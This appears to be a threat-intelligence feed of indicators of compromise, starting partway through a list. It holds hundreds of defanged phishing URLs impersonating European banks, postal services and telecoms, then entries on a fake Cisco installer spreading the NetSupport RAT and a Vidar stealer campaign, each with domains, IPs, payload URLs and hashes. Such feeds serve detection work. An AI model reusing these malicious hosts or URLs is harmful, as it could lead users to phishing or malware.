http://postfnccontact[.]de[.]swtest[.]ru/de/secure/auth/login[.]php, http://internetbanking[.]ne-tu[.]eu//libraro/mm/web/login[.]php, http://bar[.]bgd[.]mybluehost[.]me/idr/DEsparkasse/spa/home/login[.]php, http://swissonlinecom[.]com/fa/99/web/login[.]php, http://eti[.]hgn[.]mybluehost[.]me/wpadmin/css/auth/home/login[.]php, http://wordpress-168935-0[.]cloudclusters[.]net/spa/spa/hom/spar/spa/home/bic[.]php, http://www[.]moraesconcreto[.]com/wpadmin/nordddea/auth/login[.]php, http://l75[.]eee[.]mywebsitetransfer[.]com/Nordea/auth/login[.]php, http://themarketersdream[.]com[.]au/auth/login[.]php, http://hostnow[.]co[.]ke/twentytwent/auth/home/login[.]php, http://serwer2397890[.]home[.]pl/imodzeb/PostFinance/Finance/auth/login[.]php, http://ashadeofjade[.]com/sar/home/tarjeta[.]php, http://www[.]hospitalcovadonga[.]com/wpcontent/languages/themes/finance/auth/login[.]php, http://myblog-on8u3ksh23[.]live-website[.]com/wpadmin/A/spa/home/login[.]php, http://www[.]postbank[.]fameseminuevos[.]com/app/loginos[.]php, http://dzempas[.]com/wp-amln[.]php/auth/login[.]php, http://littlelight-baby[.]com/vod/auth/login[.]php, http://signin-postfinanceaccountch[.]sslawoff[.]com/id/auth/login[.]php, http://fastupdate[.]tempurl[.]host/vubs/vubs/web/login[.]php, http://politicsniger[.]com[.]ng/wpcontent/upgrade/auth/login[.]php, http://obzoronlinecasino[.]ru/wpadmin/stand/app/logins[.]php, http://sparrow[.]de/sa/home/tarjeta[.]php, http://www[.]edenthub[.]com/Downloads/consor/web/login[.]php, http://rfpiliberia[.]com/Application/DE/consor/web/login[.]php, http://thetrend[.]blog/wp-admin/search/web/login[.]php, http://www[.]turismotierraestella[.]com/fonts/_notes/tf/web/login[.]php, http://vfo[.]hdv[.]mybluehost[.]me/website_e9e0f586/A/tfsf/2023/web/login[.]php, http://postsendungschweiz[.]sviluppo[.]host/paket/global/index[.]php, http://clinicaperezdelolmo[.]com/wpincludes/assets/759821354697201255/auth/651f0b7cc227dcfa4c39a30c159dabf5[.]php, http://serwer1739297[.]home[.]pl/-/blog/fio/fiobanka/auth/login[.]php, http://tareeqalghaith[.]com/bas2024/auth/f8bc37e4d02386531effa2f0382cf809[.]php, http://cd69506[.]tw1[.]ru/PostFinance/auth/login[.]php, http://cznew[.]tempurl[.]host/aji/cz/web/login[.]ph, http://abelza[.]pl/cy/auth/login[.]php, http://everdaysca[.]temp[.]swtest[.]ru/up/spaaa/sparkasse/spa/home/login[.]php, http://melon-soft-hosting[.]com/cy/auth/login[.]php, http://support-contacthmz2[.]codeanyapp[.]com/D/Sparkass/auth/home/login[.]php, http://bol[.]yqp[.]mybluehost[.]me/css/auth/home/login[.]php, http://vdv6y[.]live/D/Spvrkvss/auth/home/login[.]php, http://universal-ferretera[.]com/mvm/auth/login[.]php, http://glenorchyinfocentre[.]co[.]nz/[.]well/3568653000/spa/home/login[.]php, http://swed[.]lietuva[.]conextium[.]com/auth/login[.]php, http://rainlapo[.]com/wpcontent/twentytwentyone/auth/home/login[.]php, http://hpp[.]b7b[.]mywebsitetransfer[.]com/SWISSPASS/auth/login[.]php, http://resultados[.]santaanadedios[.]com/css/auth/home/login[.]php, http://trocken[.]online/twentytwentyone/auth/home/login[.]php, http://adminparoisses42[.]fr/glpi/vendor/htmlawed/htmlawed/sparkasse/auth/home/login[.]php, http://emswidebay[.]com[.]au/rel/res/home/entrar[.]php, http://tadbircard[.]ir/govsa/res/home/tarjeta[.]php, http://bomnegociorural[.]com[.]br/d/home/entrar[.]php, http://fio[.]cz[.]k1informatica[.]com[.]br/auth/login[.]php, http://www[.]fio[.]cz[.]yviitv[.]com/auth/login[.]php, http://musclemeal[.]co[.]in/fonts/fb0/akkount/de/index[.]php, http://bubblecard[.]org/bubblecard[.]lk/KJ0/akkount/de/index[.]php, http://lt-coach[.]com/wpcontent/plugins/css/akkount/de/index[.]php, http://capetownew[.]tempurl[.]host/wp-tach/cz/web/login[.]php, http://rootland[.]in/mo0/akkount/de/index[.]php, http://rootland[.]in/wpincludes/Requests/bv1/akkount/de/index[.]php, http://millenium-velegozh[.]ru/news/files/cz/web/login[.]php, http://otpbank[.]cs-group[.]digital/post/auth/login[.]php, http://cec[.]ro[.]fabricebernasconiborzi[.]com/auth/login[.]php, http://lumdevelopmentresearch[.]com/wpcontent/plugins/auth/login[.]php, http://anaika[.]birlanavya63a[.]com/wpincludes/Requests/Cookie/auth/login[.]php, http://fort-client[.]college/consor/web/login[.]php, http://idkontoaktualisieren383266[.]codeanyapp[.]com/tr/home/login[.]php, http://www[.]ljrtrucking[.]com/Configs/PostFinance/auth/login[.]php, http://decorfine[.]com[.]ec//[.]well-known/pki-validation/login, http://posttfiinancelusi[.]com/PostF/auth/login[.]php, http://www[.]postfinance[.]ch/ap/ba/ob/html/finance/home?login, http://shrioswalsamaj[.]com/wpcontent/plugins/eqlfrvxfrz/ve/web/login[.]php, http://aktualisierung-kontoinformationenmarklisy1992160133[.]codeanyapp[.]com/ag/home/login[.]php, http://occasionifissowindtre[.]com/auth/login, http://otpdirekt[.]ro[.]pitruzzellaimpianti[.]it/auth/login[.]php, http://otpdirekt[.]sytes[.]net/otp/auth/login[.]php, http://www[.]santander-kreditkortconsumer[.]grey[.]com[.]pk/[.]f6f1fcaf81183bea5949c9ef837912945, http://kundenservice-ingdirekt-girokontoappmovil[.]codeanyapp[.]com/FR/sg/web/login[.]php, http://secure3-mabanque-bnpparibas[.]fr/auth/login[.]php, http://smartbank-otpbank[.]nobokoli[.]com/auth/login[.]php, http://arrarra[.]sa[.]com/app/login[.]php, http://suryamatrimony[.]in/[.]f6f1fcaf81183bea5949c9ef837912945, http://www[.]smartbank-otpbank[.]pieseimp[.]ro/auth/login[.]php, http://atchondabikestore[.]com/wpadmin/maint/web/login[.]php, http://48j[.]e35[.]mywebsitetransfer[.]com/carrefoures/auth/login[.]php, http://areabienesyservicios[.]com/res/res/home/entrar[.]php, http://whitefoxpouch[.]com/a/advancia/sparkasse/spa/home/bic[.]php, http://bundesanzeiger[.]gbclinic[.]com/[.]f6f1fcaf81183bea5949c9ef837912945, http://fomrationa[.]temp[.]swtest[.]ru/kada/spaaa/sparkasse/spa/home/login[.]php, http://regulardane[.]10web[.]site/de/mphb/2023/web/login[.]php, http://billsleek[.]in/ic0/comp/de, http://billsleek[.]in/ip0/de/akk/index[.]php, http://group-ibannk[.]web12010[.]web09[.]berowebspace[.]de/api/auth/login[.]php, http://myblog-mf8zji6ax8[.]livewebsite[.]com/mphb/2023/web/login[.]php, http://www[.]conectandocontumagia[.]com/lifrong/home/index[.]php, http://ibnk-gr-info[.]web12010[.]web09[.]berowebspace[.]de/api/auth/login[.]php, http://secure16-bnpparibas[.]fr/auth/login[.]php, http://ctbctw[.]icepluschap[.]com/tw/ctbcbank_panel/auth/login[.]php, http://secure19-bnpparibas[.]fr/auth/login[.]php, http://secure8-bnpparibas[.]fr/auth/login[.]php, http://servicecarfourassist[.]organiccrap[.]com/V0reER/index[.]php, http://srv204523[.]hostertest[.]ru/b456rt46d/4bre41gd2/xc4v21eczr/web/Login[.]php, http://vub[.]companyonlinecom[.]site/vub/web/login[.]php, http://automotive5[.]sa[.]com/login/app/login[.]php, http://secure213[.]inmotionhosting[.]com/~cocoam6/wpincludes/js/tinymce/plugins/compat3x/css/libra/web/login[.]php, http://nuevolead[.]com/tflogist/web/login[.]php, http://medra[.]sa[.]com/login/app/login[.]php, http://secure17-bnpparibas[.]fr/auth/login[.]php, http://ccmmmm[.]sa[.]com/login/app/login[.]php, http://www[.]indasiaglobal[.]com/-/webd/c/h/blue/11/23/2[.]99/d/e/8z52zee520ee/x854z1z5ze0000e/Sw/de/index[.]php, http://ergstaffingtemps[.]com/wpadmin/SAOPAZZE/home/card[.]php, http://statelinks[.]net/rmb/cxv/auth/login[.]php, http://www[.]nd-more-kartenabrechnung[.]de/il/index[.]php, http://buy[.]bigbenespana[.]es/cgi-biin/home/entrar[.]php, http://tourised[.]com/postbankgirokonto24/post1/423565/2455/de/user[.]php, http://toursgaudi[.]com/zahlung/home/index[.]php, http://billsleek[.]in/cd1/akkount/de/index[.]php, http://billsleek[.]in/ar0/st/arr/login[.]php, http://bnkgroup-gr[.]dorian[.]hostline[.]net[.]pl/api/auth/login[.]php, http://iaiqh[.]ac[.]id/auth/login[.]php, http://inndesage[.]org/mrd/fnbvics/mp33rd/auth/login[.]php, http://shrey[.]prep[.]co[.]in/auth/login[.]php, http://www[.]nbg[.]group[.]paymentsclaim[.]com/auth/login[.]php, http://afiliados[.]emanuelhallef[.]com[.]br/appcha/home/entrar[.]php, http://atualoja[.]com/zahlung/home/index[.]php, http://lasaath[.]com/Postfinance/home/login[.]php, http://organizacionvip[.]com/zahlung/home/index[.]php, http://tfservvabdofreedy27329072[.]codeanyapp[.]com/mphb/2023/web/login[.]php, http://icaroaph[.]com/liefere/home/index[.]php, http://cristianheredia[.]com/home/index[.]php, http://secure257[.]inmotionhosting[.]com/~dralsafadi/inro/web/login[.]php, http://mivcard[.]com/vieca/home/index[.]php, http://chcfngo[.]in/de/mphb/2023/web/login[.]php, http://mail[.]mindmateapp[.]com/error/israel2k23/il/step2[.]php, http://auth[.]facture-comptable-enligne[.]xyz/auth/login[.]php, http://dsfp5[.]ru[.]com/login/app/login[.]php, http://jsdmadeira[.]pt/home/index[.]php, http://israelbepostcoil[.]it/il/index[.]php, http://simasbos[.]id/assets/font/IKUJYHTGFR/2023/web/login[.]php, http://nenaotransportes[.]srv[.]br/vieca/home/index[.]php, http://gertfb[.]tempurl[.]host/look/web/login[.]php, http://anunciosparaempresas[.]com[.]br/wpcontent/upgrade/tf/web/login[.]php, http://digistore[.]myanmarcafe[.]trade/vieca/home/index[.]php, http://hamam-wellness[.]com/spa/home/card[.]php, http://opdatterinformasjon[.]dynv6[.]net/[.]f6f1fcaf81183bea5949c9ef837912945, http://sfr-annulationesim[.]fr/fr/51043913074cd820fe0fdafa16e77b07[.]php, http://alpha[.]parcelvit[.]com/login, http://brookfieldagricultural[.]com[.]au/wpadmin/yuoi/home/card[.]php, http://doutshstg[.]wpenginepowered[.]com/al/home/login[.]php, http://salviano[.]udoit[.]com[.]br/home/index[.]php, http://teamafitness[.]com/wp-admin/ibola/home/card[.]php, http://www[.]seoppcnews[.]com/wpadmin/Sapoer/home/card[.]php, http://www[.]mediamondo[.]com/vieca/-/home/index[.]php, http://ctbcbank-comtaseneh779753577[.]codeanyapp[.]com/cbtc/src/login[.]php, http://smart[.]patrickattema[.]nl/home/index[.]php, http://service-annulation-sfr[.]fr/fr/login[.]php, http://annulation-e-sim-sfr[.]fr/fr/login[.]php, http://ghi[.]billsleek[.]in/fg1/akkount/de/index[.]php, http://app[.]follieeventi[.]it/i/c/auth/login[.]php, http://www[.]tryyourweb[.]com/post/home/index[.]php, http://app[.]fnaemiliaromagna[.]it/ign/cec/auth/login[.]php, http://service-sim-sfr[.]fr/fr/login[.]php, http://ing[.]login-nic-ae[.]com/ign/gr/auth/login[.]php, http://oppdatterkontanktinformasjonn[.]de/[.]f6f1fcaf81183bea5949c9ef837912945, http://tw-postsafiramira099303091[.]codeanyapp[.]com/web/login[.]php, http://meine-tfbank-detaseneh779753577[.]codeanyapp[.]com/web/login[.]php, http://billsleek[.]in/sb3/akkount/de/index[.]php, http://app-153bc257-0381-4ee7-ba06-16f8e40914fc[.]cleverapps[.]io/tar/home/login[.]php, http://boxer[.]vivawebhost[.]com/~sharcoho/udomasa/vendor/brick/math/src/Internal/Calculator/inro/web/login[.]php, http://secure253[.]inmotionhosting[.]com/~belkoc5/wpincludes/js/tinymce/plugins/compat3x/css/inro/web/login[.]php, http://delivery-club-jacobs-millicano-test[.]digitalpreprod[.]ru/dpo/home/index[.]php, http://dev-s-id-check[.]pantheonsite[.]io/spa/home/card[.]php, http://licenselinks[.]com/vieca/home/index[.]php, http://secure4-bnpparibas[.]fr/auth/login[.]php, http://ausfilliing[.]duckdns[.]org/Au/global/index[.]php, http://zahlen-diepost[.]com/global/index[.]php, http://srv199153[.]hostertest[.]ru/n4f6g54h6r5t/b489t4h3f2/web/login[.]php, http://swiss-post-ch[.]com/global/index[.]php, http://musclemeal[.]co[.]in/sp06/akkount/de/index[.]php, http://secure2-credit-agricole[.]fr/fr/login[.]php, http://divinepublicschool[.]in/ax04/ax/axa-meine/index[.]php, http://secure3-sfr[.]fr/fr/login[.]php, http://diepost-login[.]com/global/index[.]php, http://article[.]wefre[.]nl/vieca/home/index[.]php, http://www[.]npt-chain[.]com/vieca/home/index[.]php, http://spl-service-sa[.]com/en/bill[.]php, http://usps[.]business/global/index[.]php, http://postal-service[.]co/ch//de/index[.]php, http://www[.]dhf-hilden[.]de/romavbv/web/login[.]php, http://musclemeal[.]co[.]in/ck1/akkount/de/index[.]php, http://www[.]instelatorim10[.]co[.]il/-/home/index[.]php, http://depkhongtuoi[.]com/ch-liefrung/home/index[.]php, http://taxibinhduong247[.]net/wpcontent/languages/seicea/home/index[.]php, http://purehoneyonline[.]com/kon/akkount/de/index[.]php, http://muscleforce[.]in/jprones/akkount/de/index[.]php, http://sonu[.]billsleek[.]in/jqGrid/frk/meine/IDPSTVONSA/index[.]php, http://cindyfernandezstudio[.]com/vieca/home/index[.]php, http://postbankmeinbestsign24h[.]elevadoresvision[.]com[.]br/postde1/423255/de/64AFD9050FBB1[.]php, http://purehoneyonline[.]com/ftx/st-point/clients/login[.]php, http://guciabu[.]com/pt/app/login[.]php, http://n2meinpost24h[.]elevadoresvision[.]com[.]br/postde1/324553/de/64A530E2B872B[.]php, http://die-osteopathin-in-wien[.]at/lvepayd/home/index[.]php, http://activation-cle-digitale-bnp-paribas[.]fr/auth/login[.]php, http://blastdesal[.]com/seices/home/index[.]php, http://hotelcampestrelafloresta[.]com/-/seices/home/index[.]php, http://myalphagr24[.]cursosglaucoleyser[.]com[.]br/alpha1/324344/2344/gr/login[.]php, http://mlsantanderesbanco24h[.]paisrecords[.]com/Qyh9C9b2YDX6g4n/santander24h/X46b9DngQ9Yy2Ch/es/login[.]php, http://todayuupdates[.]tempurl[.]host/tmb/tf/tf/web/login[.]php, http://uwtestserver3[.]nl/home/index[.]php, http://www[.]postbankdebest24h[.]biocroche[.]com[.]br/bestsignpostde24h/733dAT6jLAw8fb/b6fd38w37jTALA/de/user[.]php, http://bnpparibas-authentification[.]fr/auth/login[.]php, http://postbankde24hbestsigne[.]robotclub[.]com[.]br/meinbestsigne24/jAwT7b3f6L3dA8/7jAfAdTb63Lw38/de/user[.]php, http://postbankmeinbestsign24h[.]elevadoresvision[.]com[.]br/post1/423545/de/648B0A104BD95[.]php, http://activation-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://bnpparibas-activation-cle-digitale[.]fr/auth/login[.]php, http://postbank1bestsignwinde1[.]connectplus[.]co[.]mz/post1/244543/4314/de/6486DF4479403[.]php, http://bnpparibas-nouvelle-cle-digital[.]fr/auth/login[.]php, http://nouveau-service-bnpparibas[.]fr/auth/login[.]php, http://nouvelle-cle-digitale-bnp-paribas[.]fr/auth/login[.]php, http://nouvelle-cle-digitale-bnpparibas[.]fr/auth/login[.]php, http://andlpostbankbestsigne24h[.]despachantersantos[.]com[.]br/post1/234544/1377/de/6480653EEC279[.]php, http://meinpostbankdebest24h[.]despachantersantos[.]com[.]br/post1/453443/4227/de/6480650BDD441[.]php, http://pixelinegroup[.]com/postde1/203943/2433/de/648036F7977D8[.]php, http://service-clients-sfr[.]fr/fr/login[.]php, http://bnp-paribas-service-clients[.]fr/auth/login[.]php, http://nosservice-bnpparibas[.]fr/auth/login[.]php, http://die-post[.]co/ch/de/index[.]php, http://service-clients-bnp-paribas[.]fr/auth/login[.]php, http://pixelinegroup[.]com/postde1/203943/2433/de/647EFFE0977E0[.]php, http://postbankdebestsigne24h[.]rsantosseguros[.]com[.]br/TA3jd7AwfbL638/TA3jd7AwfbL638/de/647F00642B3E2[.]php, http://postbankdeibest24h[.]despachantersantos[.]com[.]br/post1/245344/3245/de/647F4CEA3686E[.]php, http://demande-esim-sfr[.]fr/fr/login[.]php, http://sfr-demande-e-sim[.]fr/fr/login[.]php, http://conversoresycables[.]com/pb/de/647DB5B0917DB[.]php, http://www[.]postbankdebest24h[.]biocroche[.]com[.]br/postde24h/ATfj33b7dLwA68/6AwLd7b338jfTA/de/user[.]php, http://service-mabanque-bnpparibas[.]fr/auth/login[.]php, http://accerpostfinarce[.]photoracertv[.]app/clientes24h/yZ4He8wcWQ764a/home/login[.]php, http://bnpparibas-service-client[.]fr/auth/login[.]php, http://kaya-group[.]eu/wpcontent/plugins/akismet/views/sviezas/home/index[.]php, http://valuecart[.]in/postch1/327892/3799/home/login[.]php, http://varshawires[.]com/postch2/378292/7622/home/login[.]php, http://nos-clients-bnpparibas[.]fr/auth/login[.]php, http://bnpparibas-nos-clients[.]fr/auth/login[.]php, http://kombbansrestaurant[.]com/post1/237888/0488/de/user[.]php, http://royalserenity[.]in/post1/829302/3722/de/user[.]php, http://unitechme[.]com/post1/328903/2987/de/user[.]php, http://rengelinkfonds[.]nl/shppment/home/index[.]php, http://rhscranes[.]com/depost2/289819/2811/de/user[.]php, http://shivaconstructions[.]co/post1/328901/3211/de/user[.]php, http://todayuupdates[.]tempurl[.]host/nikmk/tf/tf/web/login[.]php, http://www[.]monterreydelsur[.]com/post1/329021/3800/de/user[.]php, http://bankingpostbansign23[.]partywebshop[.]com/H2rp32R4eFnk5N/de/user[.]php, http://melnpostdesumzug[.]dtmteam[.]com/enpH42325FkrRN/de/user[.]php, http://comerzbanc[.]tel/lp/login/web/login[.]php, http://rawqha[.]com/commerzbank[.]de/web/login[.]php, http://www[.]commerzbank-loginup[.]multifilium[.]com/web/login[.]php, http://kunden[.]commerzservice[.]eu/web/login[.]php, http://grupopercon[.]com/wp-content/cai/home/entrar[.]php, http://caixadirectaonline[.]cgd-pt[.]tel/cdo/login[.]php, http://assistance-swiss-post[.]info/de/index[.]php, http://miseajour-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://votre-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://sim-sfr-service[.]fr/fr/login[.]php, http://cle-digitale-service-bnpparibas[.]fr/auth/login[.]php, http://bnp-paribas-nouvelle-cle-digitale[.]fr/auth/login[.]php, http://bnpparibas-nouvelle-cle-digitale[.]fr/auth/login[.]php, http://bnp-paribas-service-cle-digitale[.]fr/auth/login[.]php, http://votre-nouvelle-cle-digitalebnpparibas[.]fr/auth/login[.]php, http://votre-nouvelle-cledigitalebnpparibas[.]fr/auth/login[.]php, http://service-cledigitale-bnp-paribas[.]fr/auth/login[.]php, http://nouvelle-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://sienahandmadeleatherbags[.]com/homr/hom/app/login[.]php, http://bnpparibas-service-cledigital[.]fr/auth/login[.]php, http://karacarulo[.]com[.]tr/menu/43356NT/app/login[.]php, http://renovvi[.]futuraproduction[.]it/servizipagamento/web/login[.]php, http://servizi[.]futurapress[.]it/servizipagamento/web/login[.]php, http://www[.]bankajk[.]com/rennovi/web/login[.]php, http://arubahosting[.]futurapress[.]it/file/servicehomeit/web/login[.]php, http://delinquenttaxsales[.]com/5235v/app/login[.]php, http://cia[.]4moor[.]it/avvizo/rennnove/web/login[.]php, http://track-posta-romana[.]com/post/confirm[.]php, http://dik[.]lelicriso[.]it/avvizo/rennnove/web/login[.]php, http://applepay-mena[.]com/id/confirm[.]php, http://aza[.]scia-a-roma[.]it/conferma/web/login[.]php, http://des[.]fabbroh24roma[.]it/conferma/web/login[.]php, http://ele[.]sos-elettricistaroma[.]it/conferma/web/login[.]php, http://server[.]bertuzzitravel[.]com/conferma/web/login[.]php, http://apu[.]impresapuliziediamante[.]it/rennovi/web/login[.]php, http://dep[.]autospurgoh24firenze[.]it/rennovi/web/login[.]php, http://www[.]jobsindubai[.]com/sendgrid/N548789564/app/login[.]php, http://perfectway[.]me/wpcontent/plugins/ioptimization/cuenta/home/entrar[.]php, http://www[.]logiroad[.]ci/wpcontent/plugins/apikey/validar/home/entrar[.]php, http://getnew[.]in/admin/controller/extension/extension/app/home/entrar[.]php, http://sportsmansharbor[.]net/tickets/DE548792164/de, http://santander-service[.]com/app/login[.]php, http://www[.]support-access[.]cf/app/login[.]php, http://www[.]supportaccess[.]peachmusicla[.]com/app/login[.]php, http://www[.]bottegafacile[.]it/modules/mod_simplefileupload, http://aspirebuildanddesign[.]com/SA654D94Z6Z4D6/home/entrar[.]php, http://yurimagoori[.]com/Z87D94Z64R96EZ546E/home/entrar[.]php, http://faporbaz[.]com/wpcontent/plugins/fecclfkawd/65S46A549846R56/home/entrar[.]php, http://adestrarseupet[.]com[.]br/wpcontent/plugins/biakvnctnl/Q654AD46546546T546R546R/home/entrar[.]php, http://bellydiet[.]com[.]br/A5D8D8T7Y8RE8/home/entrar[.]php, http://elbe[.]co[.]jp/news/wpcontent/plugins/dzjoskqgvj/5S46F56G5G4/home/entrar[.]php, http://bnpparibasconnexion[.]fr/app/id[.]php, http://cloud[.]physik-patio13[.]de/validar/home/entrar[.]php, http://kaqcnadqbo[.]cfolks[.]pl/65A6498R46T546/home/entrar[.]php, http://req-cap01w[.]net/auth/signin[.]php, http://pycwckviqz[.]cfolks[.]pl/654654R4TY44Y/home/entrar[.]php, http://www[.]watch-support[.]cf/app/login[.]php, http://www[.]watchsupport[.]starpizzapakistan[.]com/app/login[.]php, http://www[.]watch-support[.]ml/app/login[.]php, http://www[.]dessertstory[.]co/depost/de, http://www[.]netflix-esupport[.]ml/app/login[.]php, http://www[.]qatarpost[.]shatta[.]net/ar, http://parturier-avocats[.]fr/wp-content/plugins/alpha/login
hash:
- md5=51043913074cd820fe0fdafa16e77b07
email: tamazpam@yahoo[.]comTitle: University site cloned to evade ad detection distributes fake Cisco installer
Summary: A recent cyber threat involved a malicious Google ad that impersonated a legitimate Cisco AnyConnect download, using the similarly convincing domain anyconnect-secure-client.com, registered shortly before the adâs launch. Attackers exploited the credibility of Technische Universität Dresden to enhance the ad's legitimacy, intending to evade security detection rather than directly deceive victims. Users who clicked the ad were redirected to a fraudulent site mimicking Cisco's brand, leading to a malicious installer for the NetSupport Remote Access Trojan (RAT) that connected to specific external IP addresses, allowing remote access to victimsâ machines. The attack utilized a PHP script for malware distribution through a compromised WordPress site and included a digitally signed installer, highlighting both effective impersonation tactics and identifiable execution flaws.
Threats: netsupportmanager_rat
Indicators of compromise:
-------------------------
ip: 91[.]222[.]173[.]67
domain: anyconnect-secure-client[.]com, cisco-secure-client[.]com[.]vissnatech[.]com, monagpt[.]com, mtsalesfunnel[.]com
url: https://berrynaturecare[.]com/wp-admin/images/cisco-secure-client-win-5[.]0[.]05040-core-vpn-predeploy-k9[.]exe
hash:
- sha256=78e1e350aa5525669f85e6972150b679d489a3787b6522f278ab40ea978dd65d
email:Title: Vidar still changes: Variable Payload and more refined clouding for this new wave
Summary: In February 2025, a new campaign involving Vidar malware was detected, employing advanced techniques such as Dynamic Domain Generation Algorithms (DGA) and delayed activation of malicious URLs to distribute an obfuscated JavaScript payload. The campaign generated 136 main domains and strategically delayed the activation of URLs, complicating immediate detection efforts. The malware has evolved to utilize sophisticated processing methods with XOR operations, complicating static analysis, and exhibits variable payloads that may lead to the deployment of additional malware post-infection.
Threats: vidar_stealer
Indicators of compromise:
-------------------------
ip: 45[.]61[.]138[.]200
domain: trailblazerwheels[.]com, travelzgo[.]com, thenoushkashow[.]com, timeforstudio[.]com, tourismheroawards[.]com, thetransformationalgrowthacademy[.]com, trailsofintrigue[.]com, thelittlebigempire[.]com, theserpentschoice[.]com, tmeador[.]com, tk-9[.]com, tomotupedido[.]com, treadpoint[.]com, treasuredcrown[.]com, timothynew[.]com, trillionserver[.]com, trendingbabz[.]com, thrivefulness[.]com, timchapmanforfairfax[.]com, thinkmovefeelwell[.]com, therapeuticpsychology[.]com, thepikeman[.]com, trinitazcap[.]com, tiktauli[.]com, thernrco[.]com, theparentpager[.]com, topcommercialbrokers[.]com, thesolarsheet[.]com, tinkerandtwig[.]com, totaltechnyc[.]com, thumbmarket[.]com, traveltransformslives[.]com, theopulentgems[.]com, therollingsquare[.]com, trapthekiller[.]com, toyland-planet[.]com, tubuz3ubhz222[.]top, thenarcissismnetwork[.]com, thereadingandwritingtutor[.]com, thoughtblob[.]com, torah4today[.]com, themfaagency[.]com, traphousegolf[.]com, thepoochery[.]com, thepolymathicshaman[.]com, tlcmmwave[.]com, trackmytow[.]com, tirionnetbw[.]com, travelinparis[.]com, titanzinterior[.]com, toocleandetails[.]com, theplaybackband[.]com, travelmotivate[.]com, thinkthegift[.]com, tokmanni-finland[.]com, theprosaist[.]com, themachinerybuyers[.]com, tinytreasuredkeepsakes[.]com, tngiants[.]com, thethailandtravelhub[.]com, tommykhoa[.]com, travelonmymind[.]com, traversecityirrigation[.]com, thessalonikiairporttaxi[.]com, timbreblocks[.]com, tokointernet[.]com, trackercardz[.]com, thinkmagicmedia[.]com, tradercompare[.]com, triviasuperxtra[.]com, travelingveteran[.]com, travelseverywhere[.]com, thisisdlsmade[.]com, topfunsports[.]com, tracyslatton[.]com, tigereyegraphics[.]com, trackedpackage[.]com, trinesoulrenewal[.]com, tk9frenchies[.]com, tmkeenlogistics[.]com, transcriptsearcher[.]com, thepluggedinmusician[.]com, tqrecords[.]com, trankvila[.]com, tonireilly[.]com, trappseptic[.]com, thevapeexpress[.]com, tofa7a[.]com, theroyalresonance[.]com, treeservicelapeermi[.]com, thelovelysarahnichole[.]com, topdiscountedproducts[.]com, timothyridgefarm[.]com, tiggy123[.]com, torontosegwayrentals[.]com, theylleatforever[.]com, time4showgt[.]com, tiendabarmesa[.]com, topdeckshirts[.]com, traveledcity[.]com, thewildnotions[.]com, thepernateamannarbor[.]com, todayybigbazzarr[.]com, tiendabombasbarnes[.]com, translatinotranslation[.]com, towerhosts[.]com, timecapitalbitbank[.]com, thesacredpathschool[.]com, thetriviaproject[.]com, tipsaplastics[.]com, themagicofplace[.]com, theollivander[.]com, thesnowbee[.]com, triggertrader[.]com, theouttedshaman[.]com, theslightlyfaded[.]com, toptravelflights[.]com, trendykala[.]com, therisereign[.]com, the-tuning-workshop-dealerzone[.]com, tonicunningham[.]com, tonysschlockfest[.]com, transgenderlockerroomaccess[.]com, trainedbuyer[.]com, thisisrandiimas[.]com, thetortemk[.]com, thosegentlemen[.]com, tradeskillpro[.]com, theshopsnearme[.]com, kibcfmgnahkgand[.]top, theprojectboxboard[.]com, thinkpublishers[.]com, theseniorshow[.]com, thezealotbusinessagency[.]com, topvideoslotscasino[.]com, tradespaceapp[.]com, thevitaminscompany[.]com, theproversation[.]com, theplantedguide[.]com, thenootropicsguide[.]com, threat-expert[.]com, thuanart[.]com, thepranichealing[.]com, topbitcoinideas[.]com, thisindiecreator[.]com, three-mongos[.]com, themakeitstore[.]com, tntwocfo[.]com, ffjihcnfkhihlmd[.]top, idioinc[.]com
url: http://ffjihcnfkhihlmd[.]top/1[.]php, https://idioinc[.]com/5t4a[.]js, https://idioinc[.]com/js[.]php
hash:
- sha256=3b98dbb7962739800e54afdd915ba344f4359c369e3ee7693998b986611c476d, sha1=50227db22d2d75b768653a7edfe11061d3c9f416, md5=7ee8a19e94c10ad9fbfb7367ec26378b
email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
